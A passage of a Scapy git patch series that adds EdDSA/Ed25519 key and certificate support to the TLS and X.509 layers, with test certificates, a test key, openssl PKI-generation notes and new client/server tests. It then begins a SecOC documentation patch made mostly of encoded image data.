scapy.layers.tls.session import tlsSession from scapy.layers.tls.crypto.groups import _tls_named_groups @@ -339,6 +339,8 @@ def HANDLED_CLIENTHELLO(self): kx = "RSA" elif isinstance(self.mykey, PrivKeyECDSA): kx = "ECDSA" + elif isinstance(self.mykey, PrivKeyEdDSA): + kx = "" if get_usable_ciphersuites(self.cur_pkt.ciphers, kx): raise self.PREPARE_SERVERFLIGHT1() raise self.NO_USABLE_CIPHERSUITE() @@ -371,6 +373,8 @@ def should_add_ServerHello(self): kx = "RSA" elif isinstance(self.mykey, PrivKeyECDSA): kx = "ECDSA" + elif isinstance(self.mykey, PrivKeyEdDSA): + kx = "" usable_suites = get_usable_ciphersuites(self.cur_pkt.ciphers, kx) c = usable_suites[0] if self.preferred_ciphersuite in usable_suites: @@ -646,6 +650,8 @@ def tls13_should_add_HelloRetryRequest(self): kx = "RSA" elif isinstance(self.mykey, PrivKeyECDSA): kx = "ECDSA" + elif isinstance(self.mykey, PrivKeyEdDSA): + kx = "" usable_suites = get_usable_ciphersuites(self.cur_pkt.ciphers, kx) c = usable_suites[0] ext = [TLS_Ext_SupportedVersion_SH(version="TLS 1.3"), @@ -786,6 +792,8 @@ def tls13_should_add_ServerHello(self): kx = "RSA" elif isinstance(self.mykey, PrivKeyECDSA): kx = "ECDSA" + elif isinstance(self.mykey, PrivKeyEdDSA): + kx = "" usable_suites = get_usable_ciphersuites(self.cur_pkt.ciphers, kx) c = usable_suites[0] group = next(iter(self.cur_session.tls13_client_pubshares)) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 52d7d65ad00..0317dc521e6 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -36,11 +36,19 @@ from scapy.utils import binrepr from scapy.asn1.asn1 import ASN1_BIT_STRING from scapy.asn1.mib import hash_by_oid -from scapy.layers.x509 import (X509_SubjectPublicKeyInfo, - RSAPublicKey, RSAPrivateKey, - ECDSAPublicKey, ECDSAPrivateKey, - RSAPrivateKey_OpenSSL, ECDSAPrivateKey_OpenSSL, - X509_Cert, X509_CRL) +from scapy.layers.x509 import ( + ECDSAPrivateKey_OpenSSL, + ECDSAPrivateKey, + ECDSAPublicKey, + EdDSAPublicKey, + EdDSAPrivateKey, + RSAPrivateKey_OpenSSL, + RSAPrivateKey, + RSAPublicKey, + X509_Cert, + X509_CRL, + X509_SubjectPublicKeyInfo, +) from scapy.layers.tls.crypto.pkcs1 import pkcs_os2ip, _get_hash, \ _EncryptAndVerifyRSA, _DecryptAndSignRSA from scapy.compat import raw, bytes_encode @@ -49,7 +57,7 @@ from cryptography.exceptions import InvalidSignature from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization - from cryptography.hazmat.primitives.asymmetric import rsa, ec + from cryptography.hazmat.primitives.asymmetric import rsa, ec, x25519 # cryptography raised the minimum RSA key length to 1024 in 43.0+ # https://github.com/pyca/cryptography/pull/10278 @@ -221,7 +229,8 @@ def __call__(cls, key_path=None): # Now for the usual calls, key_path may be the path to either: # _an X509_SubjectPublicKeyInfo, as processed by openssl; # _an RSAPublicKey; - # _an ECDSAPublicKey. + # _an ECDSAPublicKey; + # _an EdDSAPublicKey. obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) try: spki = X509_SubjectPublicKeyInfo(obj.der) @@ -231,10 +240,10 @@ def __call__(cls, key_path=None): obj.import_from_asn1pkt(pubkey) elif isinstance(pubkey, ECDSAPublicKey): obj.__class__ = PubKeyECDSA - try: - obj.import_from_der(obj.der) - except ImportError: - pass + obj.import_from_der(obj.der) + elif isinstance(pubkey, EdDSAPublicKey): + obj.__class__ = PubKeyEdDSA + obj.import_from_der(obj.der) else: raise marker = b"PUBLIC KEY" @@ -347,11 +356,12 @@ def fill_and_store(self, curve=None): @crypto_validator def import_from_der(self, pubkey): # No lib support for explicit curves nor compressed points. - self.pubkey = serialization.load_der_public_key(pubkey, - backend=default_backend()) # noqa: E501 + self.pubkey = serialization.load_der_public_key( + pubkey, + backend=default_backend(), + ) def encrypt(self, msg, h="sha256", **kwargs): - # cryptography lib does not support ECDSA encryption raise Exception("No ECDSA encryption support") @crypto_validator @@ -364,6 +374,37 @@ def verify(self, msg, sig, h="sha256", **kwargs): return False +class PubKeyEdDSA(PubKey): + """ + Wrapper for EdDSA keys based on the cryptography library. + Use the 'key' attribute to access original object. + """ + @crypto_validator + def fill_and_store(self, curve=None): + curve = curve or x25519.X25519PrivateKey + private_key = curve.generate() + self.pubkey = private_key.public_key() + + @crypto_validator + def import_from_der(self, pubkey): + self.pubkey = serialization.load_der_public_key( + pubkey, + backend=default_backend(), + ) + + def encrypt(self, msg, **kwargs): + raise Exception("No EdDSA encryption support") + + @crypto_validator + def verify(self, msg, sig, **kwargs): + # 'sig' should be a DER-encoded signature, as per RFC 3279 + try: + self.pubkey.verify(sig, msg) + return True + except InvalidSignature: + return False + + ################ # Private Keys # ################ @@ -416,7 +457,12 @@ def __call__(cls, key_path=None): obj.__class__ = PrivKeyECDSA marker = b"EC PRIVATE KEY" except Exception: - raise Exception("Unable to import private key") + try: + privkey = EdDSAPrivateKey(obj.der) + obj.__class__ = PrivKeyEdDSA + marker = b"PRIVATE KEY" + except Exception: + raise Exception("Unable to import private key") try: obj.import_from_asn1pkt(privkey) except ImportError: @@ -581,6 +627,37 @@ def sign(self, data, h="sha256", **kwargs): return self.key.sign(data, ec.ECDSA(_get_hash(h))) +class PrivKeyEdDSA(PrivKey): + """ + Wrapper for EdDSA keys + Use the 'key' attribute to access original object. + """ + @crypto_validator + def fill_and_store(self, curve=None): + curve = curve or x25519.X25519PrivateKey + self.key = curve.generate() + self.pubkey = self.key.public_key() + + @crypto_validator + def import_from_asn1pkt(self, privkey): + self.key = serialization.load_der_private_key(raw(privkey), None, + backend=default_backend()) # noqa: E501 + self.pubkey = self.key.public_key() + + @crypto_validator + def verify(self, msg, sig, **kwargs): + # 'sig' should be a DER-encoded signature, as per RFC 3279 + try: + self.pubkey.verify(sig, msg) + return True + except InvalidSignature: + return False + + @crypto_validator + def sign(self, data, **kwargs): + return self.key.sign(data) + + ################ # Certificates # ################ diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 87649e12c22..d9ddda437a6 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -26,7 +26,7 @@ ) from scapy.packet import Packet from scapy.layers.tls.extensions import TLS_Ext_Unknown, _tls_ext -from scapy.layers.tls.cert import PrivKeyECDSA, PrivKeyRSA +from scapy.layers.tls.cert import PrivKeyECDSA, PrivKeyRSA, PrivKeyEdDSA from scapy.layers.tls.crypto.groups import ( _tls_named_curves, _tls_named_ffdh_groups, @@ -39,8 +39,8 @@ if conf.crypto_valid: from cryptography.hazmat.primitives.asymmetric import ec if conf.crypto_valid_advanced: - from cryptography.hazmat.primitives.asymmetric import x25519 - from cryptography.hazmat.primitives.asymmetric import x448 + from cryptography.hazmat.primitives.asymmetric import ed25519 + from cryptography.hazmat.primitives.asymmetric import ed448 class KeyShareEntry(Packet): @@ -329,15 +329,16 @@ def get_usable_tls13_sigalgs(li, key, location="certificateverify"): from scapy.layers.tls.keyexchange import _tls_hash_sig res = [] if isinstance(key, PrivKeyRSA): - kxs = ["rsa"] + kx = "rsa" elif isinstance(key, PrivKeyECDSA): - kxs = [] - if isinstance(key.key, x25519.X25519PrivateKey): - kxs.append("ed25519") - elif isinstance(key.key, x448.X448PrivateKey): - kxs.append("edx448") + kx = "ecdsa" + elif isinstance(key, PrivKeyEdDSA): + if isinstance(key.pubkey, ed25519.Ed25519PublicKey): + kx = "ed25519" + elif isinstance(key.pubkey, ed448.Ed448PublicKey): + kx = "ed448" else: - kxs = ["ecdsa"] + kx = "unknown" else: return res if location == "certificateverify": @@ -353,6 +354,6 @@ def get_usable_tls13_sigalgs(li, key, location="certificateverify"): _, sig = sigalg.split('+') else: sig = sigalg - if any(kx in sig for kx in kxs): + if kx in sig: res.append(c) return res diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 620bcc2cc6b..5d8e4191912 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -180,6 +180,35 @@ class ECDSASignature(ASN1_Packet): ASN1F_INTEGER("s", 0)) +#################################### +# x25519/x448 packets # +#################################### +# based on RFC 8410 + +class EdDSAPublicKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_BIT_STRING("ecPoint", "") + + +class AlgorithmIdentifier(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("algorithm", None), + ) + + +class EdDSAPrivateKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER("version", 1, {1: "ecPrivkeyVer1"}), + ASN1F_PACKET("privateKeyAlgorithm", AlgorithmIdentifier(), AlgorithmIdentifier), + ASN1F_STRING("privateKey", ""), + ASN1F_optional( + ASN1F_PACKET("publicKey", None, + ECDSAPublicKey, + explicit_tag=0xa1))) + + ###################### # X509 packets # ###################### @@ -799,6 +828,10 @@ def __init__(self, **kargs): ECDSAPublicKey(), ECDSAPublicKey), lambda pkt: "ecPublicKey" == pkt.signatureAlgorithm.algorithm.oidname), # noqa: E501 + (ASN1F_PACKET("subjectPublicKey", + EdDSAPublicKey(), + EdDSAPublicKey), + lambda pkt: pkt.signatureAlgorithm.algorithm.oidname in ["Ed25519", "Ed448"]), # noqa: E501 ], ASN1F_BIT_STRING("subjectPublicKey", ""))] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) diff --git a/test/scapy/layers/tls/cert.uts b/test/scapy/layers/tls/cert.uts index d75c89c5ac1..ceeeeb719bf 100644 --- a/test/scapy/layers/tls/cert.uts +++ b/test/scapy/layers/tls/cert.uts @@ -132,6 +132,13 @@ weDU+RsFxcyU/QxD9WYORzYarqxbcA== """) type(y) is PrivKeyECDSA += PrivKey class : Checking public attributes +assert y.key.curve.name == "secp256k1" +y.key.public_key().public_numbers().y == 86290575637772818452062569410092503179882738810918951913926481113065456425840 + += PrivKey class : Checking private attributes +y.key.private_numbers().private_value == 90719786431263082134670936670180839782031078050773732489701961692235185651857 + = PrivKeyECDSA sign & verify ~ crypto_advanced a = PrivKeyECDSA() @@ -162,12 +169,12 @@ assert x_privNum.dmp1 == a_privNum.dmp1 assert x_privNum.dmq1 == a_privNum.dmq1 assert x_privNum.d == a_privNum.d -= PrivKey class : Checking public attributes -assert y.key.curve.name == "secp256k1" -y.key.public_key().public_numbers().y == 86290575637772818452062569410092503179882738810918951913926481113065456425840 - -= PrivKey class : Checking private attributes -y.key.private_numbers().private_value == 90719786431263082134670936670180839782031078050773732489701961692235185651857 += PrivKey class: Importing PEM-encoded EdDSA private key +y = PrivKey(""" +-----BEGIN PRIVATE KEY----- +MC4CAQAwBQYDK2VwBCIEIGu36oadjA6raCmwtImfAWI/DSCENM/uQCsUaClVoUTZ +-----END PRIVATE KEY----- +""") + PrivKey/Pubkey test signatures @@ -408,6 +415,27 @@ weDU+RsFxcyU/QxD9WYORzYarqxbcA== -----END EC PRIVATE KEY-----""") assert ks[0][:-1] == ks[1] += Import PEM-encoded certificate with ed25519 signature +x = Cert(""" +-----BEGIN CERTIFICATE----- +MIICqDCCAZCgAwIBAgIUYYDvh160/Q32Q/MuCGSfIYxTwwEwDQYJKoZIhvcNAQEL +BQAwVDELMAkGA1UEBhMCTU4xFDASBgNVBAcMC1VsYWFuYmFhdGFyMRcwFQYDVQQL +DA5TY2FweSBUZXN0IFBLSTEWMBQGA1UEAwwNU2NhcHkgVGVzdCBDQTAeFw0yNDA3 +MTQxOTU4MzNaFw0zNDA3MTUxOTU4MzNaMFgxCzAJBgNVBAYTAk1OMRQwEgYDVQQH +DAtVbGFhbmJhYXRhcjEXMBUGA1UECwwOU2NhcHkgVGVzdCBQS0kxGjAYBgNVBAMM +EVNjYXB5IFRlc3QgU2VydmVyMCowBQYDK2VwAyEAB8exZcGWUFeio0aPES732u5l +GXRUuaktLmSIQB8PoPejaDBmMA8GA1UdEwEB/wQFMAMCAQEwEwYDVR0lBAwwCgYI +KwYBBQUHAwEwHQYDVR0OBBYEFJOzQR0udLrz7IiLP3q+FehLxijkMB8GA1UdIwQY +MBaAFGZTlPQV0b1naLBRNzI14aSq3gd8MA0GCSqGSIb3DQEBCwUAA4IBAQCRk6TP +XKfSy2fwodsYe1bedhL9mlm9xDDOu6ILkDZtCpbOwrjeSf+U7VQYvdlI8QCeQyEK +ZE/S3S5UzOjEv7fQpyqfG9aJJbH7OQwG25ShiX86Kt/RAkgtjyCmKevhT6uSs5fa +BsdYWnS9WHWH5ZkWkjZt1K2xYJP4Lqg9VpHy/YNz4b5swXEWf+MdayVSgzPxoviG +zXnsTrxiTcGvelGFm/lYc42u6cSqrHoLtfniyaGNvPwrfBsiY/cypN4GZLNgEk80 +/tcAg2TeUGNbMbT4Rko1OMLxMT9zRzgJyjd/XyW/5fCE/Xm0q7VYo1EF1ScywU1B +XwZH9DJ6Ud0s8/j+ +-----END CERTIFICATE----- +""") + ########### CRL class ############################################### diff --git a/test/scapy/layers/tls/example_server.py b/test/scapy/layers/tls/example_server.py index f307abf095b..d9ec859a07d 100644 --- a/test/scapy/layers/tls/example_server.py +++ b/test/scapy/layers/tls/example_server.py @@ -21,6 +21,12 @@ from scapy.tools.UTscapy import scapy_path parser = ArgumentParser(description='Simple TLS Server') +parser.add_argument("--cert", + default=scapy_path('/test/scapy/layers/tls/pki/srv_cert.pem'), + help="Cert file.") +parser.add_argument("--key", + default=scapy_path('/test/scapy/layers/tls/pki/srv_key.pem'), + help="Key file.") parser.add_argument("--psk", help="External PSK for symmetric authentication (for TLS 1.3)") # noqa: E501 parser.add_argument("--no_pfs", action="store_true", @@ -49,8 +55,8 @@ else: psk_mode = "psk_dhe_ke" -t = TLSServerAutomaton(mycert=scapy_path('/test/scapy/layers/tls/pki/srv_cert.pem'), - mykey=scapy_path('/test/scapy/layers/tls/pki/srv_key.pem'), +t = TLSServerAutomaton(mycert=args.cert, + mykey=args.key, preferred_ciphersuite=args.pcs, preferred_signature_algorithm=args.psa, client_auth=args.client_auth, diff --git a/test/scapy/layers/tls/pki/README.md b/test/scapy/layers/tls/pki/README.md new file mode 100644 index 00000000000..a3117f15f98 --- /dev/null +++ b/test/scapy/layers/tls/pki/README.md @@ -0,0 +1,9 @@ +# Notes on how to generate the PKI + +``` +openssl genpkey -algorithm ED25519 -out srv_key_ed25519.pem +openssl req -new -key srv_key_ed25519.pem -out srv_cert_ed25519.csr -addext basicConstraints=critical,CA:FALSE,pathlen:1 -addext "extendedKeyUsage = serverAuth" -subj "/C=MN/L=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test Server" +openssl x509 -req -days 3653 -in srv_cert_ed25519.csr -CA ca_cert.pem -CAkey ca_key.pem -out srv_cert_ed25519.pem -copy_extensions copyall +rm srv_cert_ed25519.csr +openssl x509 -in srv_cert_ed25519.pem -text -noout +``` diff --git a/test/scapy/layers/tls/pki/srv_cert_ed25519.pem b/test/scapy/layers/tls/pki/srv_cert_ed25519.pem new file mode 100644 index 00000000000..72396340360 --- /dev/null +++ b/test/scapy/layers/tls/pki/srv_cert_ed25519.pem @@ -0,0 +1,17 @@ +-----BEGIN CERTIFICATE----- +MIICqDCCAZCgAwIBAgIUYYDvh160/Q32Q/MuCGSfIYxTwwEwDQYJKoZIhvcNAQEL +BQAwVDELMAkGA1UEBhMCTU4xFDASBgNVBAcMC1VsYWFuYmFhdGFyMRcwFQYDVQQL +DA5TY2FweSBUZXN0IFBLSTEWMBQGA1UEAwwNU2NhcHkgVGVzdCBDQTAeFw0yNDA3 +MTQxOTU4MzNaFw0zNDA3MTUxOTU4MzNaMFgxCzAJBgNVBAYTAk1OMRQwEgYDVQQH +DAtVbGFhbmJhYXRhcjEXMBUGA1UECwwOU2NhcHkgVGVzdCBQS0kxGjAYBgNVBAMM +EVNjYXB5IFRlc3QgU2VydmVyMCowBQYDK2VwAyEAB8exZcGWUFeio0aPES732u5l +GXRUuaktLmSIQB8PoPejaDBmMA8GA1UdEwEB/wQFMAMCAQEwEwYDVR0lBAwwCgYI +KwYBBQUHAwEwHQYDVR0OBBYEFJOzQR0udLrz7IiLP3q+FehLxijkMB8GA1UdIwQY +MBaAFGZTlPQV0b1naLBRNzI14aSq3gd8MA0GCSqGSIb3DQEBCwUAA4IBAQCRk6TP +XKfSy2fwodsYe1bedhL9mlm9xDDOu6ILkDZtCpbOwrjeSf+U7VQYvdlI8QCeQyEK +ZE/S3S5UzOjEv7fQpyqfG9aJJbH7OQwG25ShiX86Kt/RAkgtjyCmKevhT6uSs5fa +BsdYWnS9WHWH5ZkWkjZt1K2xYJP4Lqg9VpHy/YNz4b5swXEWf+MdayVSgzPxoviG +zXnsTrxiTcGvelGFm/lYc42u6cSqrHoLtfniyaGNvPwrfBsiY/cypN4GZLNgEk80 +/tcAg2TeUGNbMbT4Rko1OMLxMT9zRzgJyjd/XyW/5fCE/Xm0q7VYo1EF1ScywU1B +XwZH9DJ6Ud0s8/j+ +-----END CERTIFICATE----- diff --git a/test/scapy/layers/tls/pki/srv_key_ed25519.pem b/test/scapy/layers/tls/pki/srv_key_ed25519.pem new file mode 100644 index 00000000000..ac7560c104e --- /dev/null +++ b/test/scapy/layers/tls/pki/srv_key_ed25519.pem @@ -0,0 +1,3 @@ +-----BEGIN PRIVATE KEY----- +MC4CAQAwBQYDK2VwBCIEIGu36oadjA6raCmwtImfAWI/DSCENM/uQCsUaClVoUTZ +-----END PRIVATE KEY----- diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index ad0a2166997..0685c53dba6 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -60,13 +60,19 @@ def check_output_for_data(out, err, expected_data): def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False, - psk=None, handle_session_ticket=False): + psk=None, handle_session_ticket=False, sigalgo="rsa"): correct = False print("Server started !") with captured_output() as (out, err): # Prepare automaton - mycert = scapy_path("/test/scapy/layers/tls/pki/srv_cert.pem") - mykey = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") + if sigalgo == "rsa": + mycert = scapy_path("/test/scapy/layers/tls/pki/srv_cert.pem") + mykey = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") + elif sigalgo == "ed25519": + mycert = scapy_path("/test/scapy/layers/tls/pki/srv_cert_ed25519.pem") + mykey = scapy_path("/test/scapy/layers/tls/pki/srv_key_ed25519.pem") + else: + raise ValueError print(mykey) print(mycert) assert os.path.exists(mycert) @@ -156,12 +162,13 @@ def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False if _failed or not _one_success: raise RuntimeError("OpenSSL returned unexpected values") -def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None, curve=None): +def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None, curve=None, sigalgo="rsa"): msg = ("TestS_%s_data" % suite).encode() # Run server q_ = Queue() th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), - kwargs={"curve": curve, "cookie": False, "client_auth": client_auth, "psk": psk}, + kwargs={"curve": curve, "cookie": False, "client_auth": client_auth, + "psk": psk, "sigalgo": sigalgo}, name="test_tls_server %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads @@ -214,6 +221,11 @@ test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True) test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, curve="x448") += Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 with Ed25519-signed cert +~ open_ssl_client + +test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, sigalgo="ed25519") + = Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 and client auth ~ open_ssl_client @@ -270,14 +282,14 @@ def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, t.run() def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, - key_update=False, sess_in_out=False): + key_update=False, sess_in_out=False, sigalgo="rsa"): msg = ("TestC_%s_data" % suite).encode() # Run server q_ = Queue() print("Starting server...") th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), kwargs={"curve": None, "cookie": False, "client_auth": client_auth, - "handle_session_ticket": sess_in_out}, + "handle_session_ticket": sess_in_out, "sigalgo": sigalgo}, name="test_tls_client %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads @@ -361,6 +373,11 @@ test_tls_client("1305", "0304", curve="x448") test_tls_client("1302", "0304", curve="secp256r1", cookie=True) += Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 with Ed25519-signed cert +~ open_ssl_client + +test_tls_client("1305", "0304", sigalgo="ed25519") + = Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and client auth ~ crypto_advanced From cbe8a09e5d37a7b26fad7c8735cb096cce214f50 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 19 Jul 2024 06:39:39 +0200 Subject: [PATCH 1324/1632] Documentation for SecOC (#4466) --- doc/scapy/graphics/automotive/autosar1.png | Bin 0 -> 146935 bytes doc/scapy/graphics/automotive/autosar2.png | Bin 0 -> 20598 bytes doc/scapy/graphics/automotive/autosar3.png | Bin 0 -> 114250 bytes doc/scapy/graphics/automotive/autosar4.png | Bin 0 -> 51105 bytes doc/scapy/layers/automotive.rst | 168 +++++++++++++++++++++ 5 files changed, 168 insertions(+) create mode 100644 doc/scapy/graphics/automotive/autosar1.png create mode 100644 doc/scapy/graphics/automotive/autosar2.png create mode 100644 doc/scapy/graphics/automotive/autosar3.png create mode 100644 doc/scapy/graphics/automotive/autosar4.png diff --git a/doc/scapy/graphics/automotive/autosar1.png b/doc/scapy/graphics/automotive/autosar1.png new file mode 100644 index 0000000000000000000000000000000000000000..eaf766cef6914d7555a89ea0eaf73e6904a83f20 GIT binary patch literal 146935 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 